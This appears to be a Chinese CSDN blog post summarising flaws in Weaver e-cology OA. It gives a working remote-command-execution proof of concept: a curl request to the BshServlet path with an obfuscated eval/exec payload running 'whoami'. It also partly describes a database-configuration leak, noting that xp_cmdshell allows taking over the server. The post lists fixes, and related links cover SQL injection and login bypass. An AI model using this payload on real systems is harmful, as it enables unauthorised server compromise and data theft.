url存在链接注入漏洞_泛微OA 漏洞汇总

最新推荐文章于 2024-07-23 09:52:23 发布
最新推荐文章于 2024-07-23 09:52:23 发布
阅读量1.5k 收藏 4
点赞数
文章标签: url存在链接注入漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39875941/article/details/112372372
版权
本文详细分析了泛微协同商务软件存在的命令执行和数据库泄露漏洞,包括漏洞描述、影响范围、复现步骤及修复方案。攻击者可利用这些漏洞获取服务器权限、执行远程代码以及非法获取数据库配置信息。
摘要由CSDN通过智能技术生成

e9eb29ec3b7ab3e1ddc2600a39c5e40c.gif

0x01 漏洞描述

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02 漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03 影响范围

泛微 e-cology<=9.0

0x04 漏洞复现

访问 http://url/weaver/bsh.servlet.BshServlet 输入 payload 如下:

5c6628a3ca3306fcb53f0759c4bb0311.png

18f92f1ec83b607d3a8a95bf3194c9bc.png

36313581093e443547e679ae910a2fe0.png

0x05 poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curl http://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/ -d 'bsh.script=ev

al%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

泛微OA系统在数据库配置信息泄露

0x01 漏洞描述

攻击者可通过该漏洞页面直接获取到数据库配置信息,攻击者可通过访问存在漏洞的页面并解密从而获取数据库配置信息,如攻击者可直接访问数据库,则可直接获取用户数据,由于泛微e-cology默认数据库大多为MSSQL数据库,结合XPCMDSHELL将可直接控制数据库服务器.

0x02 影响范围

目前已知为8.100.0531,不排除其他版本,包括不限于EC7.0、EC8.0、EC9.0版

0x03漏洞复现

 对

最低0.47元/天 解锁文章
weixin_39875941
关注
怎样利用XSS漏洞在其它网站注入链接
努力是为了站在万人之中,成为别人的光
11-24 1万+
怎样利用XSS漏洞在其它网站注入链接?什么是XSS攻击怎样利用XSS漏洞在别人网站注入链接XSS攻击注入链接有效果吗?对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而言的,指的是使用违反搜索引擎质量规范的优化方法提高排名。虽然不提倡用黑帽SEO,但了解黑帽优化技术、常见软件工具,是避免被惩罚的最好方法。 去年,英国的SEO老手Tom Anthony曝出一个 Google蜘蛛存在漏洞,可能被黑帽SEO利用XSS漏洞在别人网站注入链接,而且这些链接确定会被Google蜘蛛抓取。这
漏洞复现泛微OA E-Cology Browser SQL注入漏洞
晚风不及你
05-16 648
泛微OA E-Cology browser存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
js经典案例_WebFuzzing方法和漏洞案例总结
weixin_39546661的博客
11-26 291
WebFuzzing方法和漏洞案例总结作者:Vulkey_Chen博客:http://gh0st.cn背景之前有幸做过一次线下的议题分享《我的Web应用安全模糊测试之路》,讲解了一些常用的WebFuzzing技巧和案例,该议题得到了很大的回响,很多师傅们也与我进行了交流,但考虑到之前分享过很多思路非常不全面,这里以本篇文章作为一次总结,以实战引出技巧思路(方法)。我的Web应用安全模糊测试之路议题...
漏洞复现泛微OA E-Cology ofsLogin 任意用户登录漏洞
最新发布
凝聚力安全团队
07-23 564
泛微OA E-Cology ofsLogin接口存在任意用户登录漏洞,不法分子可以利用这个漏洞绕过身份验证,以任意用户身份登录系统。这样,攻击者能够访问和操作系统中的敏感数据,执行用户权限内的所有操作,甚至可能提升权限,造成数据泄露、篡改等严重安全问题。
url存在链接注入漏洞_检测到目标URL存在SQL注入漏洞
weixin_39939661的博客
12-22 1734
解决办法防护建议包括部署分层安全措施(包括在接受用户输入时使用参数化的查询)、确保应用程序仅使用预期的数据、加固数据库服务器防止不恰当的访问数据。建议使用以下措施防范SQL注入漏洞:对于开发========使用以下建议编写不受SQL注入***影响的web应用。参数化查询:SQL注入源于***者控制查询数据以修改查询逻辑,因此防范SQL注入***的最佳方式就是将查询的逻辑与其数据分隔,这可以防止执行...
url存在链接注入漏洞_cve-2019-6453 mIRC远程代码执行漏洞
weixin_27037521的博客
12-09 401
mIRC是英国mIRC公司出品的IRC(Internet Relay Chat) 类客户端软件,目前风靡于全世界。界面优美,彩色文本行,全DCC、XDCC 文件发送和接收能力,aliases,远程命令和事件操作,与位置相关的下拉菜单,WWW和声音支持,还可以为你建立自己的组群,满足你和朋友们单独沟通的需求。研究人员在mIRC应用中发现一个漏洞,攻击者利用该漏洞可以远程执行命令,下载和安装恶意软件。...
php 跳转到指定url_url跳转漏洞原理及绕过方式
weixin_39759989的博客
12-06 922
注:本文仅供学习参考0x01 url跳转原理及利用0x02 url跳转bypass0x03 url跳转修复0x01 url跳转原理及利用先走个流程说些废话,url重定向漏洞也称url任意跳转漏洞,网站信任了用户的输入导致恶意攻击,url重定向主要用来钓鱼,比如url跳转中最常见的跳转在登陆口,支付口,也就是一旦登陆将会跳转任意自己构造的网站,如果设置成自己的url则会造成钓鱼。来看个最典...
漏洞复现泛微OA E-Cology GetLabelByModule SQL注入漏洞
晚风不及你
05-16 1037
泛微OA E-Cology getLabelByModule存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245)
12-25
泛微OA xmlrpcServlet接口任意文件读取漏洞(CNVD-2022-43245),可以指定文件路径进行读取,并提供检测方案
漏洞复现泛微OA E-Cology SignatureDownLoad SQL注入漏洞
晚风不及你
05-15 595
泛微OA E-Cology SignatureDownLoad存在SQL注入漏洞,允许攻击者非法访问和操作数据库,可能导致数据泄露、篡改、删除,甚至控制整个服务器。
【1day】复现泛微OA某版本SQL注入漏洞
记录并分享学习安全的知识点..
08-21 648
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微OA存在SQL注入漏洞,攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。
开发技术 Web开发,防止url注入
11-09
这段程序是针对各业务系统通过URL进行越权注入进行控制的脚本
教你如何绕过防止注入链接
05-15
教你如何绕过防止注入链接教你如何绕过防止注入链接
检测到目标url存在框架注入漏洞_CheckXSS:基于 Python3 的跨站脚本漏洞检测工具...
weixin_39611037的博客
11-27 1143
一、工具安装下载地址项目地址:Jewel591/CheckXSS或使用 git 命令直接克隆项目到本地:git clone https://github.com/Jewel591/CheckXSS.git环境搭建注意:需要使用 python 3.6, python3.7 由于字符转义问题,运行会报错。进入项目目录,使用 pip 安装 python 模块:pip3 install -r requir...
Java 过滤器解决URLSQL注入漏洞、跨站漏洞、框架注入漏洞链接注入漏洞
SuperstarSteven的博客
08-16 6327
一、 漏洞描述 1. 检测到目标URL存在SQL注入漏洞 很多WEB应用中都存在SQL注入漏洞。SQL注入是一种攻击者利用代码缺陷进行攻击的方式,可在任何能够影响数据库查询的应用程序参数中利用。例如url本身的参数、post数据或cookie值。 2.检测到目标URL存在跨站漏洞 跨站脚本攻击(也称为XSS)指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时,通常会点击其中的链接。攻击者通过在链接中插入恶意代码,就能够盗取用户信息或在终端用户系统上执行恶意代码
nginx重定向到其他url方法_常见漏洞验证方法
weixin_39804523的博客
11-21 1655
扫描器扫完网站后,如何验证漏洞,一下是几个常见漏洞的验证方法:1、跨站脚本原理:指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。(1)GET方式跨站脚本具体方法:在输入的参数后逐条添加以下语句,以第一条为例,http://www.exmaple.com/page.xxx?...
url存在链接注入漏洞_CNVD202041793、CNVD202041794、CNVD202041795漏洞报告
weixin_42299645的博客
12-11 482
动动大拇指快快关注哦本文来自未命名安全团队内部小组原创分享,未经授权禁止转载.作者:未命名安全团队@YinYi危害级别中深圳市博思协创网络科技有限公司 IBOS v4.5.5影响产品漏洞描述IBOS是一个基于PHP开发的协同办公管理系统。IBOS办公系统存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。CNVD-2020-417931漏洞复现漏洞触发位置在个人网盘中的新建文件夹处...
url存在链接注入漏洞_【漏洞通告】Citrix SDWAN远程代码执行漏洞通告(CVE20208271)...
weixin_30750685的博客
01-05 532
2020年11月8日,安全研究者Ariel Tempelhof披露,Citrix SD-WAN中存在多个漏洞,影响除最新版本11.2.2,11.1.2b和10.2.8以外的多个版本,攻击者可以利用此漏洞执行任意代码。近日漏洞利用方式被公开,深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。漏洞名称 :Citrix SD-WAN远程代码执行漏洞(CVE-2020-8271)...
CRLF注入漏洞URL重定向、资源处理拒绝服务详细介绍(附实例)
ran的博客
04-26 4330
1.随便访问一个页面,这里以baidu.com为例。2.将其数据包复制一部分出来。3. 当我们在url的后面加上/search时,数据包内的GET后也会对应增加。4.当我们在其后面加入换行的符号,然后再加上host=www.xiaodi8.com,数据包下面就会多出来一行内容。5.那么此时就可能会将数据包里host标识后面的值给覆盖获取取代掉,此时就可能会发生重定向。6.这种漏洞很容易进行检测。
泛微OA8前台SQL注入漏洞解析与利用示例
泛微OA8系统中,存在一个关键的SQL注入漏洞,主要出现在getdata.jsp页面。该漏洞位于URL的cmd参数中,通过不安全的操作将用户提交的请求直接传递给weaver.hrm.common.AjaxManager类的getData方法。这个方法首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值